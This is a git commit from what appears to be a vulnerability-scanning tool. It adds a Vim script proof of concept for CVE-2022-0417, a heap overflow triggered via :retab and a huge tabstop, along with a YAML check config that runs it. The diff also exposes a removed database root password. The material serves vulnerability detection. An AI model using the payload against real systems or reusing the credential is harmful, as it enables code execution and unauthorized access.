CVE-2022-0417

2023-03-10 13:47:58 +08:00 · 2023-03-10 13:47:58 +08:00 · f0d0189ca3
parent 6f92768056
commit f0d0189ca3
4 changed files with 58 additions and 2 deletions
--- a/data/SystemPocs/CVE-2022-0417/CVE-2022-0417
+++ b/data/SystemPocs/CVE-2022-0417/CVE-2022-0417
@ -0,0 +1,8 @@
 norm0o00000000000000000000ÿ0“000
 sil!normc00	0
 fu Retab(g,n)
 exe"ret"a:n
 endf
 cal l("",Retab(0,3)
 se tabstop=5500000000
 cal l("",Retab(0,0)
--- a/data/SystemPocs/CVE-2022-0417/CVE-2022-0417.yaml
+++ b/data/SystemPocs/CVE-2022-0417/CVE-2022-0417.yaml
@ -0,0 +1,48 @@
 FormatVer: 20230310
 Id: VE-2022-0417
 Belong: system
 PocHazardLevel: low
 Source: https://huntr.dev/bounties/fc86bc8d-c866-4ade-8b7f-e49cec306d1a/
 SiteInfo:
    Name: Vim是一款基于UNIX平台的编辑器。
    Severity: high
    Description:
        vim存在安全漏洞，该漏洞源于这个漏洞允许攻击者可利用该漏洞输入一个特别制作的文件，导致崩溃或代码执行。
    ScopeOfInfluence:
        vim < 8.2.4245
    References:
        - https://github.com/vim/vim/commit/652dee448618589de5528a9e9a36995803f5557a
        - https://nvd.nist.gov/vuln/detail/CVE-2022-0417
    SiteClassification:
        CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
        CvssScore: 7.8
        CveId: CVE-2022-0417 
        CweId: CWE-787,CWE-122
        CnvdId: None
        KveId: None
    Tags:
        - cve2022
        - 崩溃
        - 代码执行
 SiteRequests:
    Implement: 
        ImArray:
            - Inter : vim
              InterArgs :
                - -u
                - NONE
                - -n
                - -X
                - -Z
                - -e
                - -m
                - -s
                - -S
              Exec : CVE-2022-0417
              Args : 
                - -c
                - ":qa!"
        ExpireTime:       #second
        Inter:
            - "??:0"
        Condition: None
--- a/data/SystemPocs/SystemPocs.yaml
+++ b/data/SystemPocs/SystemPocs.yaml
@ -16,4 +16,4 @@ ExplorerItems:
    # - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml   //开发完新字段后才能使用 
    - ConfigFile: CVE-2022-0543/CVE-2022-0543.yaml
    - ConfigFile: CVE-2021-41773/CVE-2021-41773.yaml
-
+    - ConfigFile: CVE-2022-0417/CVE-2022-0417.yaml  
--- a/src/tools/FastScan/FastScan.go
+++ b/src/tools/FastScan/FastScan.go
@ -17,7 +17,7 @@ import (
 var (
    dbhostsip  = "172.17.20.121:3306"
    dbusername = "root"
-    dbpassword = "Kylin123-"
+    dbpassword = ""
    dbname     = "kylincve"
 )